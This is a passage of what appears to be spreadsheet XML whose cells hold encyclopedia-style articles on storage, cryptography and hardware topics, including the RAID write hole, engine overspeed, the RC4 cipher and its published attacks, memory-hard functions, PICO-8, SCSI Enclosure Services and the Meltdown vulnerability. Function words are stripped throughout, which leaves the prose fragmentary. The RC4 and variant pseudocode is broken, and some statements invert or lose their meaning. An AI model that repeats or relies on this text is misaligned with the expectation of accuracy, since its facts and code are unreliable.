interrupted destaging writes disk. write hole addressed write-ahead logging. this fixed mdadm introducing dedicated journaling device avoid performance penalty, typically, ssds nvms preferred) purpose.this little understood rarely mentioned failure mode redundant storage systems utilize transactional features. database researcher gray wrote "update place poison apple" early days relational database commercialization. write-cache reliability there concerns write-cache reliability, specifically regarding devices equipped write-back cache, caching system reports data written soon written cache, opposed written non-volatile medium. system experiences power loss major failure, data irrevocably lost cache reaching non-volatile storage. reason good write-back cache implementations include mechanisms, redundant battery power, preserve cache contents across system failures (including power failures) flush cache system restart time. also network-attached storage (nas) non-raid drive architectures redundant array independent memory s.m.a.r.t. references external links "empirical measurements disk failure rates error rates", gray catharine ingen, december 2005 mathematics raid-6, peter anvin does fake raid offer advantage over software raid? discussion superuser.com comparing raid implementation methods dell.com baarf: battle against raid five (raid versus raid clean-slate look disk scrubbing</t>
  </si>
  <si>
    <t>Overspeed</t>
  </si>
  <si>
    <t>overspeed condition engine allowed forced turn beyond design limit. consequences running engine fast vary engine type model depend upon several factors, important duration overspeed speed attained. with engines, momentary overspeed result greatly reduced engine life catastrophic failure. speed engine typically measured revolutions minute (rpm). examples overspeed propeller aircraft, overspeed occur propeller, usually connected directly engine, forced turn fast high-speed airflow aircraft dive, moves flat blade pitch cruising flight governor failure feathering failure, becomes decoupled engine. aircraft, overspeed results axial compressor exceeds maximal operating rotational speed. this often leads mechanical failure turbine blades, flameout total destruction engine. ground vehicles, engine forced turn quickly changing inappropriately gear. most unregulated engines overspeed power applied little load. event diesel engine runaway (caused excessive intake combustibles), diesel engine overspeed condition quickly rectified. example diesel engine powering equipment well head. operators pocket natural gas, come surface engine take flammable rapidly increase speed engine destroyed, unless intake shut off, starving engine fuel oxygen. overspeed protection sometimes regulator governor fitted make engine overspeed impossible less likely. example: many steam engines centrifugal governor, closes throttle high restrict steam flow engine speed increases. motor vehicles, automatic transmissions change gear prevent engine turning quickly. additionally, almost modern vehicles fitted electronic limiter device fuel supply sparks engine prevent overspeed. some aircraft constant-speed units automatically change propeller pitch keep engine running optimal speed.large diesel engines sometimes fitted secondary protection device actuates governor fails. this consists flap valve intake. engine overspeeds, airflow intake rise abnormal level. this causes flap valve snap shut, starving engine shutting down. different overspeed occurrences prevention internal combustion engines excerpt presented francisco maritime national park association illustrates types overspeed systems governor engine control. overspeed governors either centrifugal hydraulic. centrifugal governors depend revolving force created weight. hydraulic governors centrifugal force drive medium accomplish task. overspeed governor implemented marine diesel engines. governor safety measure acts engine approaching overspeed trip engine regulator governor fails. trips engine cutting fuel injection centrifugal force levers linked governor collar. turbines overspeeds power plant turbines catastrophic, resulting failure turbines' shafts blades balance potentially throwing blades metal parts high speeds. different safeguards exist, include mechanical electrical protection system.mechanical overspeed protection form sensors. system relies centripetal force shaft, spring, weight. designed point overspeed, balance point weight shifted, causing lever release valve makes trip header lose pressure draining. this loss affects pressure, moves trip mechanism trip system off.an electrical overspeed detection system involves gear teeth probes. these probes detect fast teeth moving, moving beyond designated rpm, relays logic solver (overspeed detection). logic solver trips system sending overspeed trip relay, connected solenoid-operated valve. mechanical electrical governors turbines turbines many mechanical devices used power generation, critical response times overspeed prevention systems precise possible. response even fraction second, lead turbines driven load (i.e. compressor, generator, pump, etc..) suffering catastrophic damage people risk. mechanical mechanical overspeed systems turbines rely equilibrium centripetal force rotating shaft imparted weight attached turbine blade. specified trip point, weight makes physical contact lever releases trip header, directly moves trip bolt and/or hydraulic circuit activate stop valves close. because contact lever occurs relatively limited angle, maximum trip response time (i.e. 0.015 sec). issue devices less response time response latency variability trip point systems sticking. some systems trip bolts redundancy, enables response latency reduced half. electrical electrical overspeed systems turbines rely multitude probes sense speed measuring passages teeth spur gear. using digital logic solver, overspeed system determines propeller shaft given ratio gear shaft. shaft high, outputs trip command de-energizes trip relay. overspeed response varies system system, check original equipment manufacturer's specification overspeed trip time accordingly. typically, unless specified otherwise, response time change output relay this time includes time required probes detect speed, compare overspeed set-point, calculate results, finally output trip command. overview overspeed detection system when configuring, testing, running overspeed systems turbines diesel engines, factor considered timing. this response overspeed usually fast people notice.there strong argument instrument trip systems total system response measured. this test change response could indicate degradation might compromise system protection point failing component. responsibility calibrating correct overspeed response specific system falls manufacturer. however, variability always present, important owner/operator understand system event maintenance, replacement, retrofitting outdated worn parts. after overspeed occurred, essential check machinery parts stress. first place start impulse turbines rotor. rotor, balance holes equalise pressure difference turbines, warped, would require replacement entire rotor. also airlines flight 1600 overclocking references</t>
  </si>
  <si>
    <t>RC4</t>
  </si>
  <si>
    <t>cryptography, (rivest cipher also known arc4 arcfour, meaning alleged rc4, below) stream cipher. while remarkable simplicity speed software, multiple vulnerabilities discovered rc4, rendering insecure. especially vulnerable beginning output keystream discarded, nonrandom related keys used. particularly problematic uses insecure protocols wep.as 2015, speculation state cryptologic agencies possess capability break used protocol. ietf published 7465 prohibit tls; mozilla microsoft issued similar recommendations.a number attempts made strengthen rc4, notably spritz, rc4a, vmpc, rc4+. history designed rivest security 1987. while officially termed "rivest cipher acronym alternatively understood stand "ron's code" (see also rc2, rc6). initially trade secret, september 1994, description anonymously posted cypherpunks mailing list. soon posted sci.crypt newsgroup, analyzed within days jenkins. from there, spread many sites internet. leaked code confirmed genuine, output found match proprietary software using licensed rc4. because algorithm known, longer trade secret. name trademarked, often referred arcfour arc4 (meaning alleged rc4) avoid trademark problems. security never officially released algorithm; rivest has, however, linked english wikipedia article course notes 2008 confirmed history code 2014 paper him.rc4 became part commonly used encryption protocols standards, 1997 2003/2004 wireless cards; 1995 successor 1999, prohibited versions 7465 2015, attacks weakening breaking used ssl/tls. main factors rc4's success wide range applications speed simplicity: efficient implementations software hardware easy develop. description generates pseudorandom stream bits keystream). stream cipher, used encryption combining plaintext using bitwise exclusive decryption performed (since exclusive given data involution). this similar one-time pad, except generated pseudorandom bits, rather prepared stream, used. generate keystream, cipher makes secret internal state consists parts: permutation possible bytes (denoted below). 8-bit index-pointers (denoted "j").the permutation initialized variable-length key, typically 2048 bits, using key-scheduling algorithm (ksa). once completed, stream bits generated using pseudo-random generation algorithm (prga). key-scheduling algorithm (ksa) key-scheduling algorithm used initialize permutation array "s". "keylength" defined number bytes range keylength 256, typically corresponding length 40–128 bits. first, array initialized identity permutation. processed iterations similar main prga, also mixes bytes time. s[i] endfor s[i] key[i keylength]) swap values s[i] s[j] endfor pseudo-random generation algorithm (prga) many iterations needed, prga modifies state outputs byte keystream. iteration, prga: increments looks element s[i], adds exchanges values s[i] s[j], uses s[i] s[j] (modulo 256) index fetch third element (the keystream value below); bitwise exclusive ored (xored) next byte message produce next byte either ciphertext plaintext.each element swapped another element least every iterations. generatingoutput: s[i]) swap values s[i] s[j] s[(s[i] s[j]) 256] output endwhile thus, produces stream k[0], k[1], xored plaintext obtain ciphertext. ciphertext[l] plaintext[l] k[l]. rc4-based random number generators several operating systems include arc4random, originating openbsd providing access random number generator originally based rc4. openbsd 5.5, released 2014, arc4random modified chacha20. implementations arc4random freebsd, netbsd linux's libbsd also chacha20. according manual pages shipped operating system, 2017 release macos operating systems, apple replaced implementation arc4random. pages arc4random include backronym replacement call random" arc4 mnemonic, provides better random data rand() does. proposed random number generators often compared random number generator.several attacks able distinguish output random sequence. implementation many stream ciphers based linear-feedback shift registers (lfsrs), which, efficient hardware, less software. design avoids lfsrs ideal software implementation, requires byte manipulations. uses bytes memory state array, s[0] s[255], bytes memory key, key[0] key[k−1], integer variables, performing modular reduction value modulo done bitwise (which equivalent taking low-order byte value question). test vectors these test vectors official, convenient anyone testing program. keys plaintext ascii, keystream ciphertext hexadecimal. security unlike modern stream cipher (such estream), take separate nonce alongside key. this means single long-term used securely encrypt multiple streams, protocol must specify combine nonce long-term generate stream rc4. approach addressing generate "fresh" hashing long-term nonce. however, many applications simply concatenate nonce; rc4's weak schedule gives rise related-key attacks, like fluhrer, mantin shamir attack (which famous breaking standard).because stream cipher, malleable common block ciphers. used together strong message authentication code (mac), encryption vulnerable bit-flipping attack. cipher also vulnerable stream cipher attack implemented correctly.it noteworthy, however, rc4, stream cipher, period time common cipher immune 2011 beast attack 1.0. attack exploits known weakness cipher-block chaining mode used ciphers supported 1.0, block ciphers. march 2013, attack scenarios proposed isobe, ohigashi, watanabe morii, well alfardan, bernstein, paterson, poettering schuldt statistical biases table recover plaintext large number encryptions.the prohibited 7465 published february 2015. roos' biases reconstruction permutation 1995, andrew roos experimentally observed first byte keystream correlated first three bytes key, first bytes permutation correlated linear combination bytes. these biases remained unexplained 2007, goutam paul, siddheshwar rathi subhamoy maitra proved keystream–key correlation and, another work, goutam paul subhamoy maitra proved permutation–key correlations. latter work also used permutation–key correlations design first algorithm complete reconstruction final permutation ksa, without assumption initialization vector. this algorithm constant probability success time, square root exhaustive search complexity. subsequently, many works performed reconstruction internal states. subhamoy maitra goutam paul also showed roos-type biases still persist even considers nested permutation indices, like s[s[i]] s[s[s[i]]]. these types biases used later reconstruction methods increasing success probability. biased outputs keystream generated biased varying degrees towards certain sequences, making vulnerable distinguishing attacks. best attack itsik mantin shamir, showed second output byte cipher biased toward zero probability 1/128 (instead 1/256). this fact third byte original state zero, second byte equal second output byte always zero. such bias detected observing bytes.souradyuti paul bart preneel cosic showed first second bytes also biased. number required samples detect bias bytes.scott fluhrer david mcgrew also showed attacks distinguished keystream random stream given gigabyte output.the complete characterization single step prga performed riddhipratim basu, shirshendu ganguly, subhamoy maitra, goutam paul. considering permutations, proved distribution output uniform given consequence, information always leaked output. fluhrer, mantin shamir attack 2001, surprising discovery made fluhrer, mantin shamir: possible keys, statistics first bytes output keystream strongly non-random, leaking information key. nonce long-term simply concatenated generate key, long-term discovered analysing large number messages encrypted key. this related effects used break ("wired equivalent privacy") encryption used 802.11 wireless networks. this caused scramble standards-based replacement 802.11 market ieee 802.11i effort wpa.protocols defend attack discarding initial portion keystream. such modified algorithm traditionally called "rc4-drop[n]", number initial keystream bytes dropped. scan default bytes, conservative value would 3072 bytes.the fluhrer, mantin shamir attack apply rc4-based ssl, since generates encryption keys uses hashing, meaning different sessions unrelated keys. klein's attack 2005, andreas klein presented analysis stream cipher, showing correlations keystream key. erik tews, ralf-philipp weinmann, andrei pychkine used analysis create aircrack-ptw, tool cracks 104-bit used 128-bit minute. whereas fluhrer, mantin, shamir attack used around million messages, aircrack-ptw break 104-bit keys 40,000 frames probability, 85,000 frames probability. combinatorial problem combinatorial problem related number inputs outputs cipher first posed itsik mantin shamir 2001, whereby, total elements typical state rc4, number elements 256) known (all elements assumed empty), maximum number elements produced deterministically also next rounds. this conjecture rest 2004 formal proof given souradyuti paul bart preneel. royal holloway attack 2013, group security researchers information security group royal holloway, university london reported attack become effective using encrypted messages. while practical attack purposes, result sufficiently close speculation plausible state cryptologic agencies already better attacks render insecure. given that, 2013, large amount traffic uses avoid attacks block ciphers cipher block chaining, hypothetical better attacks exist, would make tls-with-rc4 combination insecure attackers large number practical scenarios.in march 2015, researcher royal holloway announced improvements attack, providing attack passwords encrypted rc4, used tls. mitzvah attack black asia 2015 conference, itsik mantin presented another attack using cipher. nomore attack 2015, security researchers leuven presented attacks wpa-tkip. dubbed numerous occurrence monitoring recovery exploit (nomore) attack, first attack kind demonstrated practice. their attack decrypt secure http cookie within hours. attack wpa-tkip completed within hour allows attacker decrypt inject arbitrary packets. variants mentioned above, important weakness comes insufficient schedule; first bytes output reveal information key. this corrected simply discarding initial portion output stream. this known rc4-dropn, typically multiple 256, 1024. number attempts made strengthen rc4, notably spritz, rc4a, vmpc, rc4+. rc4a souradyuti paul bart preneel proposed variant, call rc4a.rc4a uses state arrays indexes each time incremented, bytes generated: first, basic algorithm performed using last step, s1[i]+s1[j1] looked second, operation repeated (without incrementing again) s1[s2[i]+s2[j2]] output.thus, algorithm arithmetic performed modulo generatingoutput: s1[i] swap values s1[i] s1[j1] output s2[s1[i] s1[j1]] s2[i] swap values s2[i] s2[j2] output s1[s2[i] s2[j2]] endwhile although algorithm required number operations output byte, greater parallelism rc4, providing possible speed improvement. although stronger rc4, algorithm also attacked, alexander maximov team developing ways distinguish output truly random sequence. vmpc variably modified permutation composition (vmpc) another variant. uses similar schedule rc4, s[(j s[i] key[i keylength]) 256] iterating times rather 256, optional additional iterations incorporate initial vector. output generation function operates follows: arithmetic performed modulo 256. generatingoutput: s[i] output s[s[s[j] swap s[i] s[j] s[j]; s[i] s[j] endwhile this attacked papers rc4a, distinguished within output bytes. rc4+ rc4+ modified version complex three-phase schedule (taking three times long rc4, rc4-drop512), complex output function performs four additional lookups array byte output, taking approximately times long basic rc4. arithmetic modulo 256. left right shift, exclusive generatingoutput: s[i] swap s[i] s[j] s[j]; s[j] s[i]; s[i] s[i&lt;&lt;5 j&gt;&gt;3] s[j&lt;&lt;5 i&gt;&gt;3] output (s[a+b] s[c⊕0xaa]) s[j+b] endwhile this algorithm analyzed significantly. spritz 2014, ronald rivest gave talk co-wrote paper updated redesign called spritz. hardware accelerator spritz published secrypt, 2016 shows multiple nested calls required produce output bytes, spritz performs rather slowly compared hash functions sha-3 best known hardware implementation rc4. algorithm arithmetic performed modulo generatingoutput: s[i]] s[j] swap values s[i] s[j] output k]]] endwhile value relatively prime size array. iterations inner loop, value (incremented every iteration) taken possible values 0...255, every byte array swapped least once. like sponge functions, spritz used build cryptographic hash function, deterministic random generator (drbg), encryption algorithm supports authenticated encryption associated data (aead), etc.in 2016, banik isobe proposed attack distinguish spritz random noise. rc4-based protocols tkip (default algorithm wpa, configured aes-ccmp instead rc4) bittorrent protocol encryption microsoft office (insecure implementation since nonce remains unchanged documents modified) microsoft point-to-point encryption transport layer security secure sockets layer (was optional prohibited 7465) secure shell (optionally) remote desktop protocol (optionally) kerberos (optionally) sasl mechanism digest-md5 (optionally, historic, obsoleted 6331) gpcode.ak, early june 2008 computer virus microsoft windows, takes documents hostage ransom obscuring rsa-1024 encryption skype modified form)where protocol marked "(optionally)", multiple ciphers system configured use. also tea, block also known extended corrected block family block ciphers that, like rc4, designed simple implement. advanced encryption standard ciphersaber references further reading paul, goutam; subhamoy maitra (2011). stream cipher variants. press. isbn 9781439831359. schneier, bruce (1995). "chapter other stream ciphers real random-sequence generators". applied cryptography: protocols, algorithms, source code (2nd ed.). wiley. isbn 978-0471117094. external links original posting algorithm cypherpunks mailing list, archived version 4345 improved arcfour modes secure shell (ssh) transport layer protocol 6229 test vectors stream cipher 7465 prohibiting cipher suites kaukonen; thayer. stream cipher encryption algorithm "arcfour". draft-kaukonen-cipher-arcfour-03. scan's entry attacks wayback machine (archived february 2015) security response weaknesses scheduling algorithm rc4rc4 wep(in)security algorithm fluhrer; mantin; shamir (summer–fall 2002). "attacks wep". cryptobytes. (2). archived original (postscript) january 2015.</t>
  </si>
  <si>
    <t>RAID processing unit</t>
  </si>
  <si>
    <t>raid processing unit (rpu) integrated circuit performs specialized calculations raid host adapter. calculations, example, necessary calculating parity data, maintaining data integrity writing disk array uses parity drive data striping. perform calculations efficiently computer's central processing unit (cpu).</t>
  </si>
  <si>
    <t>SOBER-128</t>
  </si>
  <si>
    <t>sober-128 synchronous stream cipher designed hawkes rose (2003) member sober family ciphers. sober-128 also designed provide (message authentication code) functionality. watanabe furuya (2004) showed weakness generation sober-128 means attack could forge message probability 2−6. functionality deleted qualcomm sober-128 reference code. sober-128 takes bits length. also helix turing references watanabe soichi furuya, forgery attack sober-128, 2004. pp472–482. philip hawkes greg rose, primitive specification sober-128, iacr eprint archive, 2003. external links sober page qualcomm open source</t>
  </si>
  <si>
    <t>Mercy (cipher)</t>
  </si>
  <si>
    <t>cryptography, mercy tweakable block cipher designed paul crowley disk encryption. block size 4096 bits—unusually large block cipher, standard disk sector size. mercy uses 128-bit secret key, along 128-bit non-secret tweak block. disk encryption, sector number would used tweak. mercy uses 6-round feistel network structure partial whitening. round function uses key-dependent state machine borrows structure stream cipher wake, key-dependent s-boxes based nyberg s-boxes also used aes. scott fluhrer discovered differential attack works full rounds mercy. this attack even extended seven-round variant. references</t>
  </si>
  <si>
    <t>Memory-hard function</t>
  </si>
  <si>
    <t>cryptography, memory-hard function (mhf) function costs significant amount memory evaluate. different memory-bound function; latter incurs cost slowing computation memory latency. mhfs find form proof work. memory hard measure there different ways measure memory hardness function. commonly seen measure cumulative memory complexity (cmc). parallel model, measures memory hardness summing inputs step. another viable measure integrating memory physical time.yet another measure memory bandwidth consumption memory bus. this category functions also dubbed "bandwidth-hard functions". motivation there reason mhfs cost memory instead example, cycles. bitcoin used repeated evaluation sha-2 function proof work, turned modern general-purpose processors, i.e. off-the-shelf cpus, inefficient tasked compute fixed function many times over. example, miners adopted application-specific integrated circuits (asics) achieved 10^16 speedup. while fine bitcoin good for, "egalitarian" hardness measure needed. words, wanted everyone equally inefficient computing function even asic. because people evaluate function efficiently can't, order make function relatively hard short-cut takers, made function hard regular user. everyone inefficient, everyone evaluate moderately-hard function. over time, recognized memory cost remains fairly equal across board. hence mhf. variants based evaluation patterns, mhfs camps: data-dependent (dmhf) data-independent (imhf). dmhfs mhfs know pieces information needed later calculations, imhfs ones ambiguity. examples dmhfs scrypt argon2d. examples imhfs argon2i catena. many mhfs developed used password hashing functions exactly memory hardness. dmhfs glaring problem prone side-channel attacks like cache timing. people tend toward imhfs reason, especially password hashing. however, imhfs mathematically proven weaker memory hardness properties dmhfs. construction depth-robust graph imhfs parallel random oracle model (prom), known fact cumulative pebbling complexity lower-bounded upper-bounded depth-robustness graph. scrypt bit-reversal-graph references</t>
  </si>
  <si>
    <t>PICO-8</t>
  </si>
  <si>
    <t>pico-8 virtual machine game engine created lexaloffle games. fantasy video game console mimics limited graphical sound capabilities 8-bit systems 1980s. goal encourage creativity ingenuity producing games without overwhelmed many possibilities modern tools machines. such design also allows pico-8 games familiar look feel.coding pico-8 accomplished lua-based environment, users create music, sound effects, sprites, maps, games. users able export games html5 games upload creations lexaloffle's official users able play games browser, view source code. pico-8 games also exported executable programs, windows, macos, linux.notable games released system include original version celeste, created four days part game jam. capabilities pico-8 program integrates code editor, sprite creation tools, audio sound effect music editor. program load games saved locally computer, form text specially encoded .png images. interface also supports splore mode, games uploaded previewed played pico-8 program. pocketchip miniature computer shipped preloaded pico-8.pico-8 games, well program's interface itself, limited 128x128 pixel, 16-color display, 4-channel audio output.the pico-8 palette contains following colors: following colors accessed entering specific instructions: development pico-8 began basic styled basic interpreter known lex500. adoption release pico-8 attracted attention programmers video game developers enjoyed challenge developing limitations, spurred development similar game engines intentional retro-style limitations. these engines commonly dubbed "fantasy consoles", based definition term pico-8's website, roughly simulate strict limitations game consoles computers. among tic-80, styles "fantasy computer," pixel vision allows user specify simulated hardware limitations wish develop under. development fantasy consoles, well development games them, evolved own, almost exclusively hobbyist, sub-community game development programming. pico-8 also seen interest among demoscene, harsh restrictions attracting programmers musicians wish make retro-style demos console.pico-8 gained additional attention 2018 release celeste. originally created pico-8 game game jam, celeste classic became popular games pico-8 bbs, prompting developers expand concept expansive, fully realized game. original pico-8 version celeste fully playable easter full version game. releases references external links official website pico-8 search cosy design spaces: talk joseph white, pico-8's creator</t>
  </si>
  <si>
    <t>PGPfone</t>
  </si>
  <si>
    <t>pgpfone secure voice telephony system developed philip zimmermann 1995. pgpfone protocol little common zimmermann's popular email encryption package, except name. used ephemeral diffie-hellman protocol establish session key, used encrypt stream voice packets. parties compared short authentication string detect man-in-the-middle attack, common method wiretapping secure phones type. pgpfone could used point-to-point (with modems) public switched telephone network, internet early voice system. 1996, protocol standards voice years later, zimmermann released successor pgpfone, zfone zrtp, newer secure voip protocol based modern voip standards. zfone builds ideas pgpfone. according pgpfone page, "mit longer distributing pgpfone. given software maintained since 1997, doubt would modern systems." also comparison voip software nautilus (secure telephone) word list secure telephone references external links pgpfone homepage pgpi pgpfone homepage pgpfone sources, modified build modern systems</t>
  </si>
  <si>
    <t>PGPDisk</t>
  </si>
  <si>
    <t>virtual disk disk encryption system allows create virtual encrypted disk within file. older versions windows freeware (for example, bundled v6.0.2i; builds pgp). these still available download, longer maintained. today, virtual disk available part desktop product family, running windows 2000/xp/vista, also disk encryption software comparison disk encryption software united states boucher federal criminal case involving pgpdisk-protected data</t>
  </si>
  <si>
    <t>SCSI Enclosure Services</t>
  </si>
  <si>
    <t>most recent scsi enclosure products support protocol called scsi enclosure services (ses). initiator communicate enclosure using specialized scsi commands access power, cooling, non-data characteristics. devices there major classes devices: attached enclosure services devices allow communication logical unit within scsi disk drive located enclosure. disk-drive communicates enclosure method, commonly used enclosure services interface (esi). fault-tolerant enclosures, disk-drive slot enabled allow communications continue even failure disk-drives. definition protocols owned ansi committee defined specifications ansi sff-8067 sff-8045. standalone enclosure services enclosures separate processor occupies address scsi bus. protocol uses direct scsi commands. enclosure fault-tolerant containing processors. commands scsi initiator communicates device using scsi commands: send diagnostic receive diagnostic results. some universal scsi commands inquiry also used standalone enclosure services perform basic functions initial discovery devices. elements scsi send diagnostic receive diagnostic results commands addressed specific element enclosure. there many different element codes defined cover wide range devices. common elements power supply, cooling fan, temperature sensor, ups. scsi command protocols assume device type must given 8-bit address. when controller interrogated status element, response includes 4-bit element status code. common element status codes are: 1h=ok, 2h=critical, 3h=warning, 5h=not installed. element thresholds some elements, voltage sensors, current sensors, temperature sensors, thresholding function. this allows enclosure detect report unacceptable environmental conditions. scsi standard allows different threshold levels, noncritical (warning) critical. also, threshold minimum maximum value. example threshold values volt power-supply could follows: minimum critical 10.8 volts minimum noncritical 11.4 volts maximum noncritical 12.6 volts maximum critical 13.2 voltsthreshold values send diagnostic command threshold diagnostic page (05h). threshold values interrogated receive diagnostic results command threshold diagnostic page (05h) one. subenclosures larger scsi storage enclosure contain multiple subenclosures. subenclosure address designated primary subenclosure return information subenclosures. scsi attached enclosure services scsi attached enclosure services computer protocol used mainly disk storage enclosures. allows host computer communicate enclosure access power, cooling, non-data characteristics. host computer communicates disks enclosure scsi interface parallel scsi, fc-al, sas, ssa. disk devices located enclosure allow scsi enclosure services (ses) communication logical unit. disk-drive communicates processor enclosure, usually enclosure services interface (esi), protocol called enclosures. data sent interface simply contents scsi command response command. implemented commands only scsi commands implemented attached enclosure services devices: also ses-2 enclosure management saf-te scsi attached fault-tolerant enclosure sgpio serial general purpose input/output bioctl hw.sensors</t>
  </si>
  <si>
    <t>Quiesce</t>
  </si>
  <si>
    <t>quiesce pause alter device application achieve consistent state, usually preparation backup maintenance. description software applications modify information stored disk, generally involves flushing outstanding writes; buffering. with telecom applications, generally involves allowing existing callers finish call preventing calls initiating. example perhaps best known support incorporated microsoft shadow copies introduced microsoft windows server 2003. application quiesced shadow copy process, must register writer responsible putting quiescent mode upon notification. vendor schemes various database application vendors implement schemes provide support feature including: symantec's livestate includes quiesce process, vmware's snapshot features. symantec supports exchange sql. vmware support system supports quiesce command used indicate state users locked database instance databases) administrative tasks performed. z/os, os/390 operating system utility command called quiesce, used order make write data belonging certain database logical entity subsystem) buffers, helping utility programs drain access datasets quickly. z/os os/390 also supports command suspend technically speaking, stops writing log, fact freezing database activity (except queries). this mode used sometimes snapshot type backup schemes, thus lasting less second, ensuring backed data consistent state. this command reversed resume command. graceful shutdown websphere called quiescing. oracle also supports quiesce command since version allows existing users continue resources disallows resources made available. sybase 12.0 support quiesce database command prevents process running commands write transaction log. primary purpose stop update activity database files copied backed using level utilities. while database quiesced, still available users read-only queries. microsoft windows sharepoint services microsoft office sharepoint server 2007/2010 support quiesce quiesce from template (2010) option within central administration operations window. this allows administrator stop server farm accepting user connections gradually brings long-running applications offline without causing data loss. jade object oriented database system perform quiesced backup parameter 'quiesced=true'. database placed quiescent state allowing current active transactions complete flushing modified buffers cache stable database. during quiesced backup, updating transactions permitted attempts execute database transactions raise database exception. microsoft visual studio team foundation server supports quiesce functionality using service control command-line utility. more information exists command-line utility msdn library. microsoft knowledge base article describes indicating disables access team foundation server services duration servicing operations. also dictionary definition quiesce wiktionary references</t>
  </si>
  <si>
    <t>Meltdown (security vulnerability)</t>
  </si>
  <si>
    <t>meltdown hardware vulnerability affecting intel microprocessors, power processors, arm-based microprocessors. allows rogue process read memory, even authorized meltdown affects wide range systems. time disclosure (2018), included devices running recent patched versions ios, linux, macos, windows. accordingly, many servers cloud services impacted, well potential majority smart devices embedded devices using arm-based processors (mobile devices, smart tvs, printers others), including wide range networking equipment. purely software workaround meltdown assessed slowing computers percent certain specialized workloads, although companies responsible software correction exploit reported minimal impact general benchmark testing.meltdown issued common vulnerabilities exposures cve-2017-5754, also known rogue data cache load (rdcl), january 2018. disclosed conjunction another exploit, spectre, shares characteristics. meltdown spectre vulnerabilities considered "catastrophic" security analysts. vulnerabilities severe security researchers initially believed reports false.several procedures help protect home computers related devices meltdown spectre security vulnerabilities published. meltdown patches produce performance loss. spectre patches reported significantly reduce performance, especially older computers; newer eighth-generation core platforms, benchmark performance drops 2–14 percent measured. january 2018, unwanted reboots, even newer intel chips, meltdown spectre patches, reported. nonetheless, according dell: 'real-world' exploits vulnerabilities [i.e., meltdown spectre] reported date january 2018], though researchers produced proof-of-concepts." further, recommended preventions include: "promptly adopting software updates, avoiding unrecognized hyperlinks websites, downloading files applications unknown sources following secure password protocols [using] security software help protect malware (advanced threat prevention software anti-virus)."on march 2018, intel reported redesign cpus help protect meltdown related spectre vulnerabilities (especially, meltdown spectre-v2, spectre-v1), expects release newly redesigned processors later 2018. october 2018, intel reported added hardware firmware mitigations regarding spectre meltdown vulnerabilities latest processors. overview meltdown exploits race condition, inherent design many modern cpus. this occurs memory access privilege checking instruction processing. additionally, combined cache side-channel attack, vulnerability allows process bypass normal privilege checks isolate exploit process accessing data belonging operating system running processes. vulnerability allows unauthorized process read data address mapped current process's memory space. since instruction pipelining affected processors, data unauthorized address almost always temporarily loaded cpu's cache out-of-order execution—from data recovered. this occur even original read instruction fails privilege checking, never produces readable result.since many operating systems physical memory, kernel processes, running user space processes address space every process, meltdown effectively makes possible rogue process read physical, kernel processes' mapped memory—regardless whether able defenses meltdown would require avoiding memory mapping manner vulnerable exploits (i.e. software-based solution) avoidance underlying race condition (i.e. modification cpus' microcode execution path).the vulnerability viable operating system privileged data mapped virtual memory unprivileged processes—which includes many present-day operating systems. meltdown could potentially impact wider range computers presently identified, little variation microprocessor families used computers.a meltdown attack cannot detected carried out. history 1995, paper called "the intel 80x86 processor architecture: pitfalls secure systems" published 1995 ieee symposium security privacy warned covert timing channel cache translation lookaside buffer (tlb). this analysis performed auspices national security agency's trusted products evaluation program (tpep). july 2012, apple's kernel (used macos, tvos, among others) adopted kernel address space layout randomization (kaslr) release mountain lion 10.8. essence, base system, including kernel extensions (kexts) memory zones, randomly relocated boot process effort reduce operating system's vulnerability attacks.in march 2014, linux kernel adopted kaslr mitigate address leaks.on august 2016, anders fogh daniel gruss presented "using undocumented behavior into kernel mode break kaslr process" black 2016 conference.on august 2016, moritz lipp graz published "armageddon: cache attacks mobile devices" proceedings 25th usenix security symposium. even though focused arm, laid groundwork attack vector.on december 2016, 33c3, clémentine maurice moritz lipp graz presented talk "what could possibly wrong &lt;insert instruction here&gt;? side effects include side-channel attacks bypassing kernel aslr" outlined already coming.on february 2017, numbers 2017-5715, 2017-5753 2017-5754 assigned intel. february 2017, bosman vrije universiteit amsterdam published findings address space layout randomization (aslr) could abused cache-based architectures ndss symposium.on march 2017, researchers austria's graz university technology developed proof-of-concept could grab keys intel enclaves running system within five minutes using certain instructions lieu fine-grained timer exploit cache dram side-channels.in june 2017, kaslr found large class vulnerabilities. research graz university technology showed solve vulnerabilities preventing access unauthorized pages. presentation resulting kaiser technique submitted black congress july 2017, rejected organizers. nevertheless, work kernel page-table isolation (kpti, originally known kaiser) 2017, confirmed eliminate large class security bugs, including limited protection not-yet-discovered meltdown fact confirmed meltdown authors. july 2017, research made public cyberwtf website security researcher anders fogh outlined cache timing attack read kernel space data observing results speculative operations conditioned data fetched invalid privileges.meltdown discovered independently jann horn google's project zero, werner haas thomas prescher cyberus technology, well daniel gruss, moritz lipp, stefan mangard michael schwarz graz university technology. research teams discovered meltdown also discovered spectre. october 2017, kernel aslr support amd64 added netbsd-current, making netbsd first totally open-source system support kernel address space layout randomization (kaslr). however, partially open-source apple darwin, forms foundation macos (among others), based freebsd; kaslr added kernel 2012 noted above. november 2017, security researcher alex ionescu publicly mentioned changes version windows would cause speed degradation without explaining necessity changes, referring similar changes linux.after affected hardware software vendors made aware issue july 2017, vulnerabilities made public jointly, january 2018, several days ahead coordinated release date january 2018 news sites started reporting commits linux kernel mails mailing list. result, patches available platforms, ubuntu, vulnerabilities disclosed. january 2018, intel reported shared news meltdown spectre security vulnerabilities chinese technology companies notifying u.s. government flaws.the security vulnerability called meltdown "the vulnerability basically melts security boundaries normally enforced hardware."on october 2018, intel reported added hardware firmware mitigations regarding spectre meltdown vulnerabilities latest processors.in november 2018, variants attacks revealed. researchers attempted compromise protection mechanisms using code exploit weaknesses memory protection bound instruction. they also attempted failed exploit operations memory alignment, division zero, supervisor modes, segment limits, invalid opcodes, non-executable code. mechanism meltdown relies race condition arise instruction execution privilege checking. briefly, instruction execution leaves side effects constitute information hidden process privilege check. process carrying meltdown uses side effects infer values memory mapped data, bypassing privilege check. following provides overview exploit, memory mapping target. attack described terms intel processor running microsoft windows linux, main test targets used original paper, also affects processors operating systems, including macos (aka ios, android. background modern design modern computer processors variety techniques gain high levels efficiency. four widely used features particularly relevant meltdown: virtual (paged) memory, also known memory mapping used make memory access efficient control processes access areas memory.a modern computer usually runs many processes parallel. operating system windows linux, process given impression alone complete computer's physical memory, likes. reality allocated memory physical memory, acts "pool" available memory, first tries given memory address trying read write it). this allows multiple processes, including kernel operating system itself, co-habit system, retain individual activity integrity without affected running processes, without vulnerable interference unauthorized data leaks caused rogue process.privilege levels, protection domains provide means operating system control processes authorized read areas virtual memory.as virtual memory permits computer refer vastly memory ever physically contain, system greatly sped "mapping" every process 